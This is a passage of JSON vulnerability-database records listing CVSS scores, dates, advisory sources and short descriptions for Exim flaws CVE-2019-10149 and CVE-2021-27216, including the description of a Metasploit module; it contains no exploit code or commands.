"id": "RH:CVE-2019-10149", "href": "https://access.redhat.com/security/cve/cve-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-08-16T02:50:02", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. 
This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:15:00", "type": "prion", "title": "CVE-2021-27216", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2022-06-28T14:11:00", "id": "PRION:CVE-2021-27216", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Exim Mail Transfer Agent 
(MTA) Improper Input Validation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-10149", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-13T15:26:44", "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-04T14:02:03", "type": "metasploit", "title": "Exim 4.87 - 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 